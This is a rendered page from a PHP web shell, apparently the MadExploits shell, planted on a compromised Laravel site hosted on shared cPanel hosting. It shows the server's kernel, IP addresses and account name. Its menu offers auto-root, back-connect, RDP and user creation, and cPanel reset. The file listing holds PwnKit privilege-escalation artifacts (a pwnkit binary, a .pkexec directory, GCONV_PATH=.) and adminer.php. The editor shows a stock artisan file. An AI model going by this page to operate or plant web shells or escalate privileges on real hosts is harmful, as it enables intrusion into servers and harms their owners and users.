Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.182
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home3 /
cp657342 /
public_html /
omicbangkok.shop /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwx------
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Modules
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
omic
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxr-x
.env
1.07
KB
-rw-r--r--
.ftpquota
17
B
-rw-------
.gitignore
740
B
-rw-r--r--
.htaccess
102
B
-rw-r--r--
.htaccess-xxxx
290
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.phpunit.result.cache
282
B
-rw-r--r--
README.md
3.75
KB
-rw-r--r--
about.php
5
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
artisan
1.7
KB
-rw-r--r--
composer.json
2.17
KB
-rw-r--r--
composer.lock
357.75
KB
-rw-rw-r--
composer1.lock
357.45
KB
-rw-rw-r--
error_log
4.12
KB
-rw-r--r--
modules_statuses.json
496
B
-rw-r--r--
package-lock.json
380.74
KB
-rw-r--r--
package.json
765
B
-rw-r--r--
phpunit.xml
1.2
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
server.php
1020
B
-rw-r--r--
webpack.mix.js
5.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close